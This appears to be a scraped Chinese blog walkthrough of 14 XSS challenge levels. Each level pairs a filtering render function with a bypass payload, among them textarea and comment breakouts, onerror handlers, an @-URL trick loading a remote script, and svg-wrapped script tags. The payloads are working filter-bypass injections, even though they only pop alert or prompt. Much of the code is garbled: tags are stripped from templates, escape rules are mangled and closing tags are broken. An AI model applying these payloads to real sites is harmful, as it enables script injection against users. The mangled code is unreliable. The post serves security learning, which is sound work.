• xss漏洞简单案例

    目录

    一:function render (input) {  return '

    '}

    二:function render (input) {  return '' + input + ''}

    ​编辑

    三:function render (input) {  return ''}

     四:function render (input) {  const stripBracketsRe = /[()]/g  input = input.replace(stripBracketsRe, '')  return input}

    五:function render (input) {  const stripBracketsRe = /[()`]/g  input = input.replace(stripBracketsRe, '')  return input}

    六:function render (input) {  input = input.replace(/-->/g, '😂')  return ''}

    七: function render (input) {  input = input.replace(/auto|on.*=|>/ig, '_')  return ``}

     八:

    function render (input) {  const stripTagsRe = /<\/?[^>]+>/gi

      input = input.replace(stripTagsRe, '')  return `

    ${input}

    `}

     九:function render (src) {  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')  return `      `}

     十:function render (input) {  let domainRe = /^https?:\/\/www\.segmentfault\.com/  if (domainRe.test(input)) {    return ``  }  return 'Invalid URL'}

    十一:

    function render (input) {  function escapeHtml(s) {    return s.replace(/&/g, '&')            .replace(/'/g, ''')            .replace(/"/g, '"')            .replace(//g, '>')            .replace(/\//g, '/')  }

      const domainRe = /^https?:\/\/www\.segmentfault\.com/  if (domainRe.test(input)) {    return ``  }  return 'Invalid URL'}

    ​编辑 十二:function render (input) {  input = input.toUpperCase()  return `

    ${input}

    `}

    十三: function escape(input) {    // pass in something like dog#cat#bird#mouse...    var segments = input.split('#');    return segments.map(function(title) {        // title can only contain 12 characters        return '

    ';    }).join('\n');}

     ​编辑

    十四:

    function escape(input) {    // sort of spoiler of level 7    input = input.replace(/\*/g, '');    // pass in something like dog#cat#bird#mouse...    var segments = input.split('#');

        return segments.map(function(title, index) {        // title can only contain 15 characters        return '

    ';    }).join('\n');} 

    为什么要加svg,svg命名空间

    一:function render (input) {
      return '
    ' + input + '
    '
    }

     解法:

  • <script> alert(1)script> //
  • 题目:
  • function render (input) {
  • return '
    ' + input + '
    '
  • }

    • 二:function render (input) {
      return ''
    }

     解法:

    1. </textarea>
    2.  
    3. 题目:
    4. function render (input) {
    5.   const stripBracketsRe = /[()]/g
    6.   input = input.replace(stripBracketsRe, '')
    7.   return input
    8. }

    五:function render (input) {
      const stripBracketsRe = /[()`]/g
      input = input.replace(stripBracketsRe, '')
      return input
    }

    解法:

    1. 1 onerror="alert(1)"
    2.  
    3. 题目:
    4. function render (input) {
    5.   const stripBracketsRe = /[()`]/g
    6.   input = input.replace(stripBracketsRe, '')
    7.   return input
    8. }

    六:function render (input) {
      input = input.replace(/-->/g, '😂')
      return ''
    }

    解法: 

    1. --!><script>alert(1)script><--
    2.  
    3. 题目:
    4. function render (input) {
    5.   input = input.replace(/-->/g, '😂')
    6.   return ''
    7. }

    七: function render (input) {
      input = input.replace(/auto|on.*=|>/ig, '_')
      return ``
    }

    解法:

    1. type="image" src=1 onerror
    2. =alert(1)
    3.  
    4. 题目:
    5. function render (input) {
    6.   input = input.replace(/auto|on.*=|>/ig, '_')
    7.   return `<input value=1 ${input} type="text">`
    8. }

     八:

    function render (input) {
      const stripTagsRe = /<\/?[^>]+>/gi

      input = input.replace(stripTagsRe, '')
      return `
    ${input}
    `
    }

    解法:

    1. 1 onerror="alert(1)"
    2.  
    3. 题目:
    4. function render (input) {
    5.   const stripTagsRe = /<\/?[^>]+>/gi
    6.  
    7.   input = input.replace(stripTagsRe, '')
    8.   return `
      ${input}
      `
    9. }

     九:function render (src) {
      src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
      return `
       
      `
    }

    解法:

    2. ><script>alert(1)script>
    3.  
    4. 题目:
    5. function render (src) {
    6.   src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
    7.   return `
    8.     
    9.   `
    10. }

     十:function render (input) {
      let domainRe = /^https?:\/\/www\.segmentfault\.com/
      if (domainRe.test(input)) {
        return ``
      }
      return 'Invalid URL'
    }

    解法: 

    1. http://www.segmentfault.com">
    2.  
    3. 题目:
    4. function render (input) {
    5.   let domainRe = /^https?:\/\/www\.segmentfault\.com/
    6.   if (domainRe.test(input)) {
    7.     return ``
    8.   }
    9.   return 'Invalid URL'
    10. }

    十一:

    function render (input) {
      function escapeHtml(s) {
        return s.replace(/&/g, '&')
                .replace(/'/g, ''')
                .replace(/"/g, '"')
                .replace(/             .replace(/>/g, '>')
                .replace(/\//g, '/')
      }

      const domainRe = /^https?:\/\/www\.segmentfault\.com/
      if (domainRe.test(input)) {
        return ``
      }
      return 'Invalid URL'
    }

    解法:

    1. http://www.segmentfault.com@127.0.0.1/test.js
    2.  
    3. //@ 可以重定向到@后面的连接中
    4.  
    5. 题目:
    6. function render (input) {
    7.   function escapeHtml(s) {
    8.     return s.replace(/&/g, '&')
    9.             .replace(/'/g, ''')
    10.             .replace(/"/g, '"')
    11.             .replace(/, '<')
    12.             .replace(/>/g, '>')
    13.             .replace(/\//g, '/')
    14.   }
    15.  
    16.   const domainRe = /^https?:\/\/www\.segmentfault\.com/
    17.   if (domainRe.test(input)) {
    18.     return ``
    19.   }
    20.   return 'Invalid URL'
    21. }

     

     十二:function render (input) {
      input = input.toUpperCase()
      return `

    ${input}

    `
    }

    解法:

    1. alert(1)>
    2.  
    3. 题目:
    4. function render (input) {
    5.   input = input.toUpperCase()
    6.   return `<h1>${input}h1>`
    7. }

     

    十三: function escape(input) {
        // pass in something like dog#cat#bird#mouse...
        var segments = input.split('#');
        return segments.map(function(title) {
            // title can only contain 12 characters
            return '

    ';
        }).join('\n');
    }

     

     解法:

    1. "><script>/*#*/prompt(/*#*/1)/*#*/script>
    2.  
    3. 题目:
    4. function escape(input) {
    5.     // pass in something like dog#cat#bird#mouse...
    6.     var segments = input.split('#');
    7.     return segments.map(function(title) {
    8.         // title can only contain 12 characters
    9.         return '<p class="comment" title="' + title.slice(0, 12) + '">p>';
    10.     }).join('\n');
    11. }

    十四:

    function escape(input) {
        // sort of spoiler of level 7
        input = input.replace(/\*/g, '');
        // pass in something like dog#cat#bird#mouse...
        var segments = input.split('#');

        return segments.map(function(title, index) {
            // title can only contain 15 characters
            return '

    ';
        }).join('\n');

     解法:

    1. "><svg><script>prompt(1)script>
    2.  
    3.  
    4. 题目:
    5. function escape(input) {
    6.     // sort of spoiler of level 7
    7.     input = input.replace(/\*/g, '');
    8.     // pass in something like dog#cat#bird#mouse...
    9.     var segments = input.split('#');
    10.  
    11.     return segments.map(function(title, index) {
    12.         // title can only contain 15 characters
    13.         return '<p class="comment" title="' + title.slice(0, 15) + '" data-comment=\'{"id":' + index + '}\'>p>';
    14.     }).join('\n');
    15. }

    为什么要加?